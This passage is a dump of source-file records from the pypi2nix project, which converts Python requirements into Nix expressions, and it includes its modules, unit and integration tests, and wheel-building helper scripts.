"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102, "license_type": "no_license", "max_line_length": 50, "num_lines": 2, "path": "/src/pypi2nix/external_dependency_collector/__init__.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .collector import ExternalDependencyCollector\nfrom .lookup import RequirementDependencyRetriever\n" }, { "alpha_fraction": 0.6522043347358704, "alphanum_fraction": 0.6592022180557251, "avg_line_length": 30.755556106567383, "blob_id": "f59610b6aa0a7bb69eab2a12b7e6a7e591f5ab9d", "content_id": "e101f2e8e35508b6901a16523e7b55c692448424", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1429, "license_type": "no_license", "max_line_length": 84, "num_lines": 45, "path": "/scripts/prepare_test_data.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"This script prepares the test fixtures for the unittests of this package\"\n\nimport os\nimport os.path\nimport shutil\nimport subprocess\n\nfrom build_wheel import build_wheel\nfrom repository import ROOT\n\nwheel_target_directory = os.path.join(ROOT, \"unittests\", \"data\")\nTEST_PACKAGES = [\"setupcfg-package\", \"package1\", \"package2\", \"package3\", \"package4\"]\n\n\ndef build_test_package(package_name):\n package_name_with_underscores = package_name.replace(\"-\", \"_\")\n package_dir = os.path.join(ROOT, \"unittests\", \"data\", package_name)\n paths_to_delete = [\n f\"{package_name_with_underscores}.egg-info\",\n \"dist\",\n f\"{package_name}.tar.gz\",\n ]\n for path in paths_to_delete:\n shutil.rmtree(os.path.join(package_dir, \"path\"), ignore_errors=True)\n subprocess.run([\"python\", \"setup.py\", \"sdist\"], cwd=package_dir, check=True)\n shutil.copy(\n os.path.join(package_dir, \"dist\", f\"{package_name}-1.0.tar.gz\"),\n wheel_target_directory,\n )\n shutil.move(\n os.path.join(package_dir, \"dist\", f\"{package_name}-1.0.tar.gz\"),\n os.path.join(package_dir, f\"{package_name}.tar.gz\"),\n )\n build_wheel(wheel_target_directory, package_dir)\n\n\ndef download_flit_wheel():\n build_wheel(wheel_target_directory, \"flit==1.3\")\n\n\nif __name__ == \"__main__\":\n for test_package in TEST_PACKAGES:\n build_test_package(test_package)\n download_flit_wheel()\n" }, { "alpha_fraction": 0.6634615659713745, "alphanum_fraction": 0.7019230723381042, "avg_line_length": 28.714284896850586, "blob_id": "f6a8b8005f6f45845cd70f1cc3c742f38aa80572", "content_id": "c6f92dafcf817c3bc624929e724a8b5799855005", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 208, "license_type": "permissive", "max_line_length": 56, "num_lines": 7, "path": "/unittests/test_util_cmd.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.logger import Logger\nfrom pypi2nix.utils import cmd\n\n\ndef test_consistent_output(logger: Logger):\n exit_code, output = cmd([\"seq\", \"5\"], logger=logger)\n assert output == \"1\\n2\\n3\\n4\\n5\\n\"\n" }, { "alpha_fraction": 0.7119784951210022, "alphanum_fraction": 0.7160161733627319, "avg_line_length": 27.576923370361328, "blob_id": "fc4d68d1b74d9ae7225aedefa095bdfd54ba355a", "content_id": "79407fb10fde5e408024780be746f871a2f0d2d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 743, "license_type": "no_license", "max_line_length": 73, "num_lines": 26, "path": "/scripts/update_python_packages.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport sys\nfrom typing import List\n\nfrom package_source import PackageSource\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.pypi import Pypi\nfrom pypi2nix.wheels import Index\n\n\ndef main():\n logger = StreamLogger(sys.stdout)\n pypi = Pypi(logger=logger)\n pip_requirements: List[str] = [\"setuptools\", \"wheel\", \"pip\"]\n git_requirements: List[str] = []\n index = Index(logger=logger)\n package_source = PackageSource(index=index, pypi=pypi, logger=logger)\n for requirement in pip_requirements:\n package_source.update_package_from_pip(requirement)\n for requirement in git_requirements:\n package_source.update_package_from_master(requirement)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7011494040489197, "alphanum_fraction": 0.7011494040489197, "avg_line_length": 23.85714340209961, "blob_id": "56bebaa2b83c35999c96aa27b9c39d3acbb92e5b", "content_id": "6604aacc11e393531947f3407c8ec8384bff2416", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 348, "license_type": "no_license", "max_line_length": 48, "num_lines": 14, "path": "/integrationtests/test_scipy.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from unittest import expectedFailure\n\nfrom .framework import IntegrationTest\n\n\n@expectedFailure\nclass ScipyTestCase(IntegrationTest):\n name_of_testcase = \"scipy\"\n code_for_testing = [\"import scipy\"]\n requirements = [\"scipy\", \"numpy\"]\n external_dependencies = [\"gfortran\", \"blas\"]\n\n def setup_requires(self):\n return [\"numpy\"]\n" }, { "alpha_fraction": 0.5986754894256592, "alphanum_fraction": 0.7185430526733398, "avg_line_length": 24.593219757080078, "blob_id": "88e3ce0bc2414dadf16c8a32b07d698a30280007", "content_id": "ae80e4d1d37e6e9a73186bbd75a1f92d7fad9784", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1510, "license_type": "permissive", "max_line_length": 88, "num_lines": 59, "path": "/unittests/test_pypi.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.pypi import Pypi\n\nfrom .switches import nix\n\n\n@pytest.fixture\ndef pypi(logger: Logger):\n return Pypi(logger)\n\n\n@nix\ndef test_pypi_get_package_returns_package_with_correct_name(pypi):\n assert pypi.get_package(\"six\").name == \"six\"\n\n\n@nix\ndef test_pypi_get_package_returns_package_with_releases(pypi):\n assert pypi.get_package(\"six\").releases\n\n\n@nix\ndef test_pypi_gets_correct_source_release_for_package_version_with_only_source_release(\n pypi,\n):\n release = pypi.get_source_release(\"six\", \"0.9.0\")\n assert (\n release.sha256_digest\n == \"14fd1ed3dd0e1a46cc53b8fc890b5a3b11737515aeb7f42c3af9f38e8d8975d7\"\n )\n\n\n@nix\ndef test_pypi_gets_correct_source_release_for_package_with_multiple_release_types(pypi):\n release = pypi.get_source_release(\"six\", \"1.12.0\")\n assert (\n release.sha256_digest\n == \"d16a0141ec1a18405cd4ce8b4613101da75da0e9a7aec5bdd4fa804d0e0eba73\"\n )\n\n\n@nix\ndef test_pypi_gets_correct_source_release_for_radiotherm_1_2(pypi):\n release = pypi.get_source_release(\"radiotherm\", \"1.2\")\n assert (\n release.sha256_digest\n == \"e8a70e0cf38f21170a3a43d5de62954aa38032dfff20adcdf79dd6c39734b8cc\"\n )\n\n\n@nix\ndef test_pypi_gets_correct_source_release_for_setuptools_1_6_0(pypi):\n release = pypi.get_source_release(\"setuptools-scm\", \"1.6.0\")\n assert (\n release.sha256_digest\n == \"c4f1b14e4fcc7dd69287a6c0b571c889dd4970559c7fa0512b2311f1513d86f4\"\n )\n" }, { "alpha_fraction": 0.6531986594200134, "alphanum_fraction": 0.6767676472663879, "avg_line_length": 28.700000762939453, "blob_id": "44225cb9bbec77231ae14ff0ee7d923bad6176bd", "content_id": "b352a394eeb8b9b9535af64e1b2666cf5dbb5a76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 297, "license_type": "no_license", "max_line_length": 73, "num_lines": 10, "path": "/integrationtests/test_flake8.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass Flake8TestCase(IntegrationTest):\n name_of_testcase = \"flake8\"\n code_for_testing = [\"import flake8\"]\n requirements = [\"flake8 == 3.7.7\"]\n\n def setup_requires(self):\n return [\"intreehooks\", \"pytest-runner\", \"setuptools-scm\", \"flit\"]\n" }, { "alpha_fraction": 0.646616518497467, "alphanum_fraction": 0.6478696465492249, "avg_line_length": 27.5, "blob_id": "7c95010f9bf15fbc43b0053a9461257bb508622e", "content_id": "75a1db7a3c8782a8c52f7a0a089ca8336fc897cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 798, "license_type": "no_license", "max_line_length": 66, "num_lines": 28, "path": "/src/pypi2nix/sources.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Dict\nfrom typing import List\nfrom typing import Tuple\n\nfrom pypi2nix.package_source import PackageSource\n\n\nclass Sources:\n def __init__(self) -> None:\n self.sources: Dict[str, PackageSource] = dict()\n\n def add(self, name: str, source: PackageSource) -> None:\n self.sources[name] = source\n\n def __contains__(self, item: str) -> bool:\n return item in self.sources\n\n def __getitem__(self, item_name: str) -> PackageSource:\n return self.sources[item_name]\n\n def update(self, other_sources: \"Sources\") -> None:\n self.sources = dict(self.sources, **other_sources.sources)\n\n def items(self) -> List[Tuple[str, PackageSource]]:\n return list(self.sources.items())\n\n def __len__(self) -> int:\n return len(self.sources)\n" }, { "alpha_fraction": 0.7567567825317383, "alphanum_fraction": 0.7567567825317383, "avg_line_length": 11.333333015441895, "blob_id": "b6849df99f3c8b06748ff892f63691b046c38eca", "content_id": "4259bc3e8ae2c098c9bd91bd39986392caf4b5b0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 37, "license_type": "permissive", "max_line_length": 21, "num_lines": 3, "path": "/unittests/switches.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nnix = pytest.mark.nix\n" }, { "alpha_fraction": 0.6478599309921265, "alphanum_fraction": 0.6653696298599243, "avg_line_length": 26.052631378173828, "blob_id": "67701d79f61ebc942d5514c776f0f9dc3275573e", "content_id": "45df13bd480cfdbe947d876dfa08d2516039ed88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 514, "license_type": "no_license", "max_line_length": 80, "num_lines": 19, "path": "/integrationtests/test_flake8_mercurial.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\nREVISION = \"a209fb6\"\n\n\nclass Flake8MercurialTestCase(IntegrationTest):\n name_of_testcase = \"flake8-mercurial\"\n code_for_testing = [\"import flake8\"]\n requirements = [\n \"-e hg+https://bitbucket.org/tarek/flake8@{revision}#egg=flake8\".format(\n revision=REVISION\n )\n ]\n\n def setup_requires(self):\n return [\"setuptools-scm\", \"pytest-runner\"]\n\n def requirements_file_check(self, content):\n self.assertIn(REVISION, content)\n" }, { "alpha_fraction": 0.6387625336647034, "alphanum_fraction": 0.6414922475814819, "avg_line_length": 28.70270347595215, "blob_id": "fad54abd0ffafc09811e13bfbdfdd2d75b3075f3", "content_id": "1af77dd83f21d0dd3158a3a78664f63f6db4417b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1099, "license_type": "no_license", "max_line_length": 80, "num_lines": 37, "path": "/src/pypi2nix/requirement_parser.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import no_type_check\n\nimport parsley\n\nfrom pypi2nix.requirement_parser_grammar import requirement_parser_grammar\nfrom pypi2nix.requirements import Logger\nfrom pypi2nix.requirements import Requirement\n\n\nclass ParsingFailed(Exception):\n def __init__(self, reason: str) -> None:\n self.reason = reason\n\n def __str__(self) -> str:\n return self.reason\n\n\nclass RequirementParser:\n def __init__(self, logger: Logger) -> None:\n self._compiled_grammar = None\n self.logger = logger\n\n @no_type_check\n def compiled_grammar(self):\n with requirement_parser_grammar(self.logger) as grammar:\n return grammar\n\n def parse(self, line: str) -> Requirement:\n line = line.strip()\n if \"\\n\" in line:\n raise ParsingFailed(\n \"Failed to parse requirement from string `{}`\".format(line)\n )\n try:\n return self.compiled_grammar()(line).specification() # type: ignore\n except parsley.ParseError as e:\n raise ParsingFailed(\"{message}\".format(message=e.formatError()))\n" }, { "alpha_fraction": 0.647216260433197, "alphanum_fraction": 0.6498929262161255, "avg_line_length": 38.74468231201172, "blob_id": "4814b6070cf71e2c32e270e1acecb3582b45d504", "content_id": "cac682a69282fedd137df37c373d9c3800a67b48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1868, "license_type": "no_license", "max_line_length": 86, "num_lines": 47, "path": "/src/pypi2nix/package/setupcfg.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Optional\n\nfrom setuptools.config import read_configuration\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import ParsingFailed\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom .interfaces import HasBuildDependencies\n\n\nclass SetupCfg(HasBuildDependencies):\n def __init__(\n self,\n setup_cfg_path: str,\n logger: Logger,\n requirement_parser: RequirementParser,\n ):\n self.setup_cfg_path = setup_cfg_path\n self.setup_cfg = read_configuration(setup_cfg_path)\n self.logger = logger\n self.requirement_parser = requirement_parser\n\n def build_dependencies(self, target_platform: TargetPlatform) -> RequirementSet:\n setup_requires = self.setup_cfg.get(\"options\", {}).get(\"setup_requires\")\n requirements = RequirementSet(target_platform)\n if isinstance(setup_requires, str):\n requirements.add(self.requirement_parser.parse(setup_requires))\n elif isinstance(setup_requires, list):\n for requirement_string in setup_requires:\n try:\n requirement = self.requirement_parser.parse(requirement_string)\n except ParsingFailed as e:\n self.logger.warning(\n f\"Failed to parse build dependency of `{self.setup_cfg_path}`\"\n )\n self.logger.warning(f\"Possible reason: `{e.reason}`\")\n else:\n if requirement.applies_to_target(target_platform):\n requirements.add(requirement)\n return requirements\n\n @property\n def name(self) -> Optional[str]:\n return self.setup_cfg.get(\"metadata\", {}).get(\"name\", None) # type: ignore\n" }, { "alpha_fraction": 0.7685009241104126, "alphanum_fraction": 0.777988612651825, "avg_line_length": 42.91666793823242, "blob_id": "8d0cf69078e2ef29bc8c9ab03b923a65f4734eed", "content_id": "a91e50375c06e52a682ffa3d738be4bc41c40e6a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 527, "license_type": "permissive", "max_line_length": 85, "num_lines": 12, "path": "/unittests/regression/test_issue_394.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "# https://github.com/nix-community/pypi2nix/issues/394\nfrom pypi2nix.requirement_parser import RequirementParser\n\n\ndef test_can_parse_requirements_with_comments(requirement_parser: RequirementParser):\n requirement = requirement_parser.parse(\"requirement # comment\")\n assert requirement.name() == \"requirement\"\n\n\ndef test_can_parse_given_test_case_from_issue(requirement_parser: RequirementParser):\n requirement = requirement_parser.parse(\"aioredis # my favourite package\")\n assert requirement.name() == \"aioredis\"\n" }, { "alpha_fraction": 0.5581395626068115, "alphanum_fraction": 0.5581395626068115, "avg_line_length": 31.25, "blob_id": "067c886a0c3e7530670997347fdaf6b87effe1eb", "content_id": "46e6b2c6204e363fb60072721ee8fda9ef9fc14d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "no_license", "max_line_length": 44, "num_lines": 4, "path": "/src/pypi2nix/pip/exceptions.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "class PipFailed(Exception):\n def __init__(self, output: str) -> None:\n self.output = output\n super().__init__()\n" }, { "alpha_fraction": 0.7417538166046143, "alphanum_fraction": 0.745776355266571, "avg_line_length": 27.9069766998291, "blob_id": "655a0099271a53e2b3f71818eeb4d584131b525a", "content_id": "f2e9c164198e685d7d29cf8d19a22d800bf66871", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1243, "license_type": "permissive", "max_line_length": 84, "num_lines": 43, "path": "/unittests/pip/test_download.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nfrom typing import List\n\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom ..switches import nix\n\n\ndef list_files(dirname: str) -> List[str]:\n return [\n candidate\n for candidate in os.listdir(dirname)\n if os.path.isfile(os.path.join(dirname, candidate))\n ]\n\n\n@nix\ndef test_pip_downloads_sources_to_target_directory(\n pip: Pip,\n project_dir: str,\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n):\n download_path = Path(project_dir) / \"download\"\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six\"))\n pip.download_sources(requirements=requirements, target_directory=download_path)\n assert download_path.list_files()\n\n\n@nix\ndef test_pip_downloads_nothing_when_no_requirements_are_given(\n pip: Pip, download_dir: Path, current_platform: TargetPlatform\n):\n pip.download_sources(\n requirements=RequirementSet(current_platform), target_directory=download_dir\n )\n assert not download_dir.list_files()\n" }, { "alpha_fraction": 0.6346153616905212, "alphanum_fraction": 0.6682692170143127, "avg_line_length": 22.11111068725586, "blob_id": "c67e6fc891ab379f29d7873da13fa7ccc68c8d7c", "content_id": "ea1c9a26cd2b6e28955d6993a98152731536c743", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 208, "license_type": "no_license", "max_line_length": 38, "num_lines": 9, "path": "/integrationtests/test_serpy_0_1_1.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass SerpyTestCase(IntegrationTest):\n name_of_testcase = \"serpy\"\n requirements = [\"serpy==0.1.1\"]\n\n def setup_requires(self):\n return [\"six==1.12.0\"]\n" }, { "alpha_fraction": 0.6763975024223328, "alphanum_fraction": 0.6795030832290649, "avg_line_length": 37.79518127441406, "blob_id": "5128bdec8fe2887b97a2a7dc358f598364580b9a", "content_id": "10bc04caef419b92b0df3eb0b622e696a14bcebd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3220, "license_type": "no_license", "max_line_length": 93, "num_lines": 83, "path": "/src/pypi2nix/requirements_collector.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "\"\"\"This module implements a class to collect requirements from command line arguments\ngiven to pypi2nix\n\"\"\"\n\nimport os.path\n\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.package_source import PathSource\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.requirements import PathRequirement\nfrom pypi2nix.requirements_file import RequirementsFile\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import TargetPlatform\n\n\nclass RequirementsCollector:\n def __init__(\n self,\n platform: TargetPlatform,\n requirement_parser: RequirementParser,\n logger: Logger,\n project_directory: str,\n base_dependency_graph: DependencyGraph,\n ):\n self.platform = platform\n self.requirement_set = RequirementSet(platform)\n self.requirement_parser = requirement_parser\n self.logger = logger\n self._project_directory = project_directory\n self._sources = Sources()\n self._base_dependency_graph = base_dependency_graph\n\n def requirements(self) -> RequirementSet:\n return self.requirement_set\n\n def add_line(self, line: str) -> None:\n original_dependency = self.requirement_parser.parse(line)\n transitive_requirements = self._base_dependency_graph.get_all_build_dependency_names(\n original_dependency\n )\n self._add_line_without_dependency_check(line)\n for requirement in transitive_requirements:\n self._add_line_without_dependency_check(requirement)\n\n def add_file(self, file_path: str) -> None:\n requirements_file = RequirementsFile(\n file_path, self._project_directory, self.requirement_parser, self.logger\n )\n requirements_file.process()\n self._sources.update(requirements_file.sources())\n added_requirements = RequirementSet.from_file(\n requirements_file, self.platform, self.requirement_parser, self.logger\n )\n transitive_requirements = set()\n for requirement in added_requirements:\n transitive_requirements.update(\n self._base_dependency_graph.get_all_build_dependency_names(requirement)\n )\n for line in transitive_requirements:\n self._add_line_without_dependency_check(line)\n self.requirement_set += added_requirements\n\n def sources(self) -> Sources:\n sources = Sources()\n sources.update(self.requirement_set.sources())\n sources.update(self._sources)\n return sources\n\n def _add_line_without_dependency_check(self, line: str) -> None:\n requirement = self.requirement_parser.parse(line)\n if isinstance(requirement, PathRequirement):\n requirement = requirement.change_path(\n lambda path: self._handle_requirements_path(\n name=requirement.name(), path=path\n )\n )\n self.requirement_set.add(requirement)\n\n def _handle_requirements_path(self, name: str, path: str) -> str:\n self._sources.add(name, PathSource(path))\n return os.path.abspath(path)\n" }, { "alpha_fraction": 0.7133640646934509, "alphanum_fraction": 0.7152073979377747, "avg_line_length": 36.41379165649414, "blob_id": "3a9627e583ba955efe1731c02528bc57e94f6a42", "content_id": "be418e3a314c129692d48f4c60b843c4ae5d5c55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1085, "license_type": "no_license", "max_line_length": 95, "num_lines": 29, "path": "/src/pypi2nix/external_dependency_collector/collector.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from copy import copy\nfrom typing import Set\n\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.requirement_set import RequirementSet\n\nfrom .lookup import RequirementDependencyRetriever\n\n\nclass ExternalDependencyCollector:\n def __init__(\n self, requirement_dependency_retriever: RequirementDependencyRetriever\n ) -> None:\n self._external_dependencies: Set[ExternalDependency] = set()\n self._requirement_dependency_retriever = requirement_dependency_retriever\n\n def collect_explicit(self, attribute_name: str) -> None:\n self._external_dependencies.add(ExternalDependency(attribute_name))\n\n def collect_from_requirements(self, requirements: RequirementSet) -> None:\n for requirement in requirements:\n self._external_dependencies.update(\n self._requirement_dependency_retriever.get_external_dependency_for_requirement(\n requirement\n )\n )\n\n def get_collected(self) -> Set[ExternalDependency]:\n return copy(self._external_dependencies)\n" }, { "alpha_fraction": 0.7724867463111877, "alphanum_fraction": 0.7883597612380981, "avg_line_length": 7.217391490936279, "blob_id": "9630873997882503d31270823e91f8bd53fb3c69", "content_id": "c0774d6fa1b90cf80e0e721eab12cab75c8701d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 189, "license_type": "no_license", "max_line_length": 23, "num_lines": 23, "path": "/requirements-dev.txt", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "# linting\nblack\nflake8\nflake8-debugger\nflake8-unused-arguments\nmypy\nisort\n\n# testing\npytest\npytest-cov\n\n# develop\npdbpp\n\n# packaging\ntwine\nbumpv\n\n# documentation\nsphinx\n\n-c constraints.txt\n" }, { "alpha_fraction": 0.6292657852172852, "alphanum_fraction": 0.6313340067863464, "avg_line_length": 35.49056625366211, "blob_id": "3fd7d30598015c39f4d6699d1520133909fd906a", "content_id": "25d15bfda56db9e336c9c8c790105488e3ed3126", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1934, "license_type": "no_license", "max_line_length": 98, "num_lines": 53, "path": "/scripts/build_wheel.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport shlex\nimport shutil\nimport sys\nimport tempfile\n\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.requirement_parser import ParsingFailed\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom repository import ROOT\n\nHERE = os.path.abspath(os.path.dirname(__file__))\nDERIVATION_PATH = os.path.join(HERE, \"build-pip.nix\")\n\n\ndef build_wheel(target_directory: str, requirement: str) -> str:\n logger = StreamLogger(sys.stdout)\n requirement_parser = RequirementParser(logger=logger)\n package_directory = os.path.join(ROOT, \"unittests\", \"data\")\n escaped_requirement = shlex.quote(requirement)\n target_directory = os.path.abspath(target_directory)\n with tempfile.TemporaryDirectory() as build_directory:\n os.chdir(build_directory)\n nix = Nix(logger=logger)\n nix.shell(\n command=f\"pip wheel {escaped_requirement} --find-links {package_directory} --no-deps\",\n derivation_path=DERIVATION_PATH,\n nix_arguments=dict(),\n )\n try:\n parsed_requirement = requirement_parser.parse(requirement)\n except ParsingFailed:\n for path in os.listdir(\".\"):\n if path.endswith(\".whl\"):\n wheel_path = path\n break\n else:\n raise Exception(\"Build process did not produce .whl file\")\n else:\n for path in os.listdir(\".\"):\n if path.endswith(\".whl\") and parsed_requirement.name() in path:\n wheel_path = path\n break\n else:\n raise Exception(\"Build process did not produce .whl file\")\n\n target_file_name = os.path.basename(wheel_path)\n target_path = os.path.join(target_directory, target_file_name)\n shutil.move(wheel_path, target_path)\n return target_file_name\n" }, { "alpha_fraction": 0.7221835255622864, "alphanum_fraction": 0.7245063781738281, "avg_line_length": 33.439998626708984, "blob_id": "a85f557ac9c74746ebcb3b416d3b995da358e5c4", "content_id": "ac8c0318499d23a0342b369edd720bfaa298c61a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4305, "license_type": "permissive", "max_line_length": 92, "num_lines": 125, "path": "/unittests/test_requirement_collector.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nimport pathlib\nfrom contextlib import contextmanager\nfrom typing import Any\nfrom typing import Generator\n\nimport pytest\n\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.package_source import PathSource\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements import PathRequirement\nfrom pypi2nix.requirements_collector import RequirementsCollector\nfrom pypi2nix.target_platform import TargetPlatform\n\n\n@contextmanager\ndef current_working_directory(dir: str) -> Generator[None, None, None]:\n current = os.getcwd()\n try:\n os.chdir(dir)\n yield\n finally:\n os.chdir(current)\n\n\n@pytest.fixture\ndef collector(\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n logger: Logger,\n project_dir: str,\n) -> RequirementsCollector:\n return RequirementsCollector(\n current_platform, requirement_parser, logger, project_dir, DependencyGraph()\n )\n\n\ndef test_that_we_can_generate_an_empty_requirement_set_from_freshly_constructed_collector(\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n logger: Logger,\n project_dir: str,\n) -> None:\n collector = RequirementsCollector(\n current_platform, requirement_parser, logger, project_dir, DependencyGraph()\n )\n requirements = collector.requirements()\n assert len(requirements) == 0\n\n\ndef test_that_we_can_add_command_line_requirements_by_name(\n collector: RequirementsCollector,\n) -> None:\n collector.add_line(\"pytest\")\n requirements = collector.requirements()\n assert \"pytest\" in requirements\n\n\ndef test_that_we_can_add_a_requirements_file_path(\n collector: RequirementsCollector, tmpdir: pathlib.Path\n) -> None:\n requirements_txt = tmpdir / \"requirements.txt\"\n requirements_lines = [\"pytest\", \"flake8\"]\n with open(requirements_txt, \"w\") as f:\n for requirement in requirements_lines:\n print(requirement, file=f)\n collector.add_file(str(requirements_txt))\n assert \"pytest\" in collector.requirements()\n assert \"flake8\" in collector.requirements()\n\n\ndef test_that_requirements_with_relative_paths_are_absolute_paths_after_adding(\n collector: RequirementsCollector,\n) -> None:\n collector.add_line(\"./path/to/egg#egg=testegg\")\n requirement = collector.requirements().get(\"testegg\")\n assert isinstance(requirement, PathRequirement)\n assert os.path.isabs(requirement.path())\n\n\ndef test_that_sources_can_be_extracted_from_a_collector(\n collector: RequirementsCollector,\n) -> None:\n collector.add_line(\"path/to/egg#egg=testegg\")\n assert \"testegg\" in collector.sources()\n\n\ndef test_that_relative_paths_are_preserved_in_sources(\n collector: RequirementsCollector,\n) -> None:\n collector.add_line(\"path/to/egg#egg=testegg\")\n testegg_source = collector.sources()[\"testegg\"]\n assert isinstance(testegg_source, PathSource)\n assert testegg_source.path == \"path/to/egg\"\n\n\ndef test_that_path_paths_from_requirement_files_are_preserved_in_sources(\n collector: RequirementsCollector, tmpdir: Any\n) -> None:\n with current_working_directory(str(tmpdir)):\n requirements_file_path = tmpdir.join(\"requirements.txt\")\n with open(requirements_file_path, \"w\") as f:\n print(\"path/to/egg#egg=testegg\", file=f)\n collector.add_file(str(requirements_file_path))\n testegg_source = collector.sources()[\"testegg\"]\n assert isinstance(testegg_source, PathSource)\n assert testegg_source.path == \"path/to/egg\"\n\n\ndef test_that_path_sources_from_requirement_files_are_preserved_in_sources_relative_to_file(\n collector: RequirementsCollector, tmpdir: Any\n) -> None:\n with current_working_directory(str(tmpdir)):\n requirements_directory = tmpdir.join(\"directory\")\n requirements_directory.mkdir()\n requirements_file_path = requirements_directory.join(\"requirements.txt\")\n with open(requirements_file_path, \"w\") as f:\n print(\"path/to/egg#egg=testegg\", file=f)\n collector.add_file(str(requirements_file_path))\n testegg_source = collector.sources()[\"testegg\"]\n assert isinstance(testegg_source, PathSource)\n assert testegg_source.path == \"directory/path/to/egg\"\n" }, { "alpha_fraction": 0.6402966380119324, "alphanum_fraction": 0.6427688598632812, "avg_line_length": 21.47222137451172, "blob_id": "113d58af31b7440a4df828bc4b2d14a6a26eb6e3", "content_id": "4ca09faea38dabd8b82c17443bc7456f7c40dbd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 809, "license_type": "no_license", "max_line_length": 66, "num_lines": 36, "path": "/src/pypi2nix/pip/interface.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from abc import ABCMeta\nfrom abc import abstractmethod\nfrom typing import List\n\nfrom pypi2nix.path import Path\nfrom pypi2nix.requirement_set import RequirementSet\n\n\nclass Pip(metaclass=ABCMeta):\n @abstractmethod\n def download_sources(\n self, requirements: RequirementSet, target_directory: Path\n ) -> None:\n pass\n\n @abstractmethod\n def build_wheels(\n self,\n requirements: RequirementSet,\n target_directory: Path,\n source_directories: 